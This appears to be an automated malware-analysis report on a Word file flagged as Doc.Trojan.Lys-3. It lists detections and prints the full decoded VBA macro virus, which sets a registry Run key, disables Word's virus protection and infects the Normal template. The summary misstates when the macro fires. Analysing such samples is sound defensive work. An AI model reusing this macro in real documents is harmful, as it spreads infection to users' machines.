Malware Insights
The sample contains a VBA macro that executes upon document opening. This macro attempts to establish persistence by writing a value to the registry Run key 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Jamie'. It also attempts to drop and execute additional malicious files named 'Jamie.vbs', 'Jamie.dll', and 'Jamie.sys' into the C:\WINDOWS\SYSTEM\ directory. The VBA code explicitly constructs the string 'Word.Application' for WScript.CreateObject, indicating a clear intent to leverage Windows Script Host for execution.
Heuristics 5
-
ClamAV: Doc.Trojan.Lys-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Lys-3
-
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Open "C:\WINDOWS\SYSTEM\Jamie.vbs" For Output As #1 Print #1, "Set Jamie = WScript.CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")" Print #1, "Jamie.Options.VirusProtection = False" -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Open "C:\WINDOWS\SYSTEM\Jamie.sys" For Output As #1 Print #1, "Private Sub Document_Open()" Print #1, "ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromFile (" & Chr(34) & "C:\WINDOWS\SYSTEM\Jamie.dll" & Chr(34) & ")"
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1400 bytes |
SHA-256: 266a2d62ae30a06dc14301ec77062fc22cbb3167b15d9d837b10587af5d6764f |
|||
|
Detection
ClamAV:
Doc.Trojan.Lys-3
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Jamie") = "C:\WINDOWS\SYSTEM\Jamie.vbs"
ActiveDocument.VBProject.VBComponents.Item(1).Export ("C:\WINDOWS\SYSTEM\Jamie.dll")
Open "C:\WINDOWS\SYSTEM\Jamie.vbs" For Output As #1
Print #1, "Set Jamie = WScript.CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"
Print #1, "Jamie.Options.VirusProtection = False"
Print #1, "Jamie.Options.SaveNormalPrompt = False"
Print #1, "Jamie.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromFile(" & Chr(34) & "C:\WINDOWS\SYSTEM\Jamie.sys" & Chr(34) & ")"
Print #1, "Jamie.Application.Quit"
Close #1
Open "C:\WINDOWS\SYSTEM\Jamie.sys" For Output As #1
Print #1, "Private Sub Document_Open()"
Print #1, "ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromFile (" & Chr(34) & "C:\WINDOWS\SYSTEM\Jamie.dll" & Chr(34) & ")"
Print #1, "With ActiveDocument.VBProject.VBComponents.Item(1).CodeModule"
Print #1, "For x = x To 3"
Print #1, ".DeleteLines 1"
Print #1, "Next"
Print #1, "End With"
Print #1, "End Sub"
Close #1
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.